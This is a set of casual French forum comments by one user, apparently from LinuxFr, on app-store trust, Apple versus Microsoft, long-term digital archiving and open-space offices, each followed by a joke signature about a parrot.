Telecharger le code source, le lire, l'auditer, le fuzzer jusqu'a la moelle, puis decompiler le binaire et verifier qu'il correspond au source, puis laisser l'appli tourner 2 mois toute seule pour voir si ya pas une time bomb dedans?
T'en as d'autres des supers reflexions a la con dans le meme style? On parle pas de double cliquer sur anna_kournikova_xxx_pr0m.jpg.exe attache a mail qui vient de russie, mais d'installer une appli qui vient du store officiel de google...
Quand Debian a distribue pendant 2 ans une version plombee d'OpenSSL, ca a ete quoi ta premiere pensee? Faut arreter d'installer n'importe quelle application sans reflechir?
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Censure?
Posté par pasScott pasForstall . En réponse au journal Envie de laisser traîner tes traces partout sur le web ?. Évalué à -1.
Waou, dingue ca, c'est du jamais vu ce genre de chose dans les forums ou plateformes de blog cette feature de moderation!
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: OpenID ?
Posté par pasScott pasForstall . En réponse au journal Envie de laisser traîner tes traces partout sur le web ?. Évalué à 1.
Non, il est parti boire une biere avec pim et poum.
L'astronome est disponible par contre.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Mais comment?
Posté par pasScott pasForstall . En réponse au journal Comment ça marche chez microsoft. Évalué à 4.
Apple.
Sauf si Steve calanche avant, ou s'ils se prennent un vilain proces par la FTC.
Ils prendront jamais une part aussi dominante que MS (ne serait ce qu'a cause de leur cible et de leur royale ignorance du marche entreprise), mais chez le particulier, ils commencent a chasser sur les terres de MS.
Bien sur, pendant ce temps les, les linuxiens en seront encore a s'engueuler pour savoir s'il faut accepter tel firmware dans le kernel dont la licence est pas tres clair a cause d'une virgule, de reecrire Pulse ALSOSS Audio v5 (promis, ce coup ci, ca va dechirer, quand tu cliques la... Ca fait pouic!!!) et les pilotes graphiques libres arriveront a faire tourner Doom 2 a 30 fps en 640*480 (bon ca rame un peu sur le boss de fin, mais, he, takacontrib!). Ah, et kde4 sera enfin a peu pres stable, apres avoir perdu 95% de ses utilisateurs (forcement, sans utilisateurs, plus de bug remontes, sont pas cons chez kde!).
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Histoire de pas se retrouver con la fois où ça nous arrivera...
Posté par pasScott pasForstall . En réponse au journal Bien joue Google. Évalué à 1.
Je suis desole de devoir t'annoncer qu'un support de stockage numerique fiable sur la duree de ta vie et de ta progeniture n'existe tout simplement pas.
Le seul truc qui pourrait le faire, c'est le bon vieux papier et l'encre.
Cote numerique, quoique tu prennes tu auras au choix le probleme de la duree de vie intrinseque du support (dvd qui claque apres 15 ans) ou de l'impossibilite de brancher ton peripherique sur le matos de dans 30 ans, voire les deux (pas convaincu que le dvd/support optique existe encore dans 20 ans).
Rajoute par dessus les problemes de formats de fichier, ce que tu cherches est tout simplement pas possible.
Le mieux que tu puisses faire a l'heure actuelle c'est:
* faire qq chose toi meme et te fader les problemes (verification reguliere de l'integrite des supports + migration vers un nouveau support quand necessaire) et les risques (cafetiere qui tombe, cambriolage, incendie, chat tres jaloux etc.) qui vont avec
* confier ca a des pros dont c'est le boulot, et payer le prix fort.
Ou faire imprimer 15 ans de mails sur du papier/encre de qualite et mettre ca a la banque, dans un coffre.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Mais comment?
Posté par pasScott pasForstall . En réponse au journal Comment ça marche chez microsoft. Évalué à -2.
Oui, ca n'a pas que des avantages, c'est sur.
Cela dit, ce que tu cite releve surtout du "savoir vivre en groupe". Tu sors pas un sandwich camembert/munster/livarot aux aromes releve quand t'es en groupe. C'est pareil dans le train par exemple.
Le mec dans le train, tu peux pas lui dire, quand c'est un collegue, tu lui fais remarquer qu'il ya une cuisine et qu'il peut aller baffrer son casse dalle la bas.
De meme, tu brailles pas dans un espace ouvert quand t'as du monde qui bosse autour.
Autre avantage important, parmi les 3 gars qui discutent sur un truc boulot en se grattant la tete, un quatrieme peut etre assis a cote, avoir la reponse ou un bout de reponse, les entendre en parler et se joindre a la discussion, sans que les autres aient pour autant pense qu'il savait qq chose.
Faut voir la gueule de l'open space apres aussi. J'ai fait des open space mixe "tout le monde ensemble en vrac, sans consideration d'equipe".Les commericaux au telephone toute la journee "Hi, I'm bob from xxx, blablabla" 50 fois par jour ou le chairman qui engueule vertement son comptable parce qu'il s'est gourre quand il a fait ses impots, oui, ca casse les couilles. Son boss/ses collegues directes a qq bureaux de la, ca saoule aussi, c'est beaucoup plus dur de communiquer rapidement sur des petits points minueurs de cette facon.
J'ai fait des open space "par equipe" delimite par des rideaux (style paravent japonais, mais en version gros ridaux de velour). L'open space en question comprend uniquement la team (et toute la team, du product development au pisseur de code avec la qa et le design, soit a la louche 10-15 personnes). Tu te tapes pas le bordel des autres equipes, les rideaux, quand ils sont fermes evitent a ceux des autres equipes de venir nous emmerder, quand ils sont ouvert ca fait comme un gros open space, et ca donne une sensation d'intimite a l'equipe qui renforce la notion de groupe soude.
Avoir toute l'equipe ensemble permet de regler des problemes plus tot que si les business owners sont a l'autre bout du batiment. Devoir cavaler toute la journee pour parler a qq personnes, ca me gave, et non, l'IM ou le telephone ne permet pas toujours de remplacer une discussion physique.
C'est pas simple a amenager, suffit pas de prendre un loft, de lacher 20 bureaux + chaises et roule ma poule.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.
[^] # Re: Mais comment?
Posté par pasScott pasForstall . En réponse au journal Comment ça marche chez microsoft. Évalué à 0.
Ca depend de la question que t'as a poser ca.
Je viens d'aller voir 3 fois le voisin de mon voisin pour des questions a la con sur le format JSON qu'il va recuperer qui auraient ete chiantes a poser par IM.
De la meme facon, t'as parfois besoin de montrer un truc son ton ecran a toi, c'est plus pratique quand le mec est a 2 metres et peut juste rouler sa chaise a ton bureau plutot que de devoir dedocker le laptop/aller le chercher dans son bureau et le faire venir.
Ben ya une certaine barriere psychologique a avoir des bureaux individuels. T'es plus hesitant a passer voir un gars quand il est dans son bureau individuel plutot qu'assis au milieu d'un groupe.
If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too.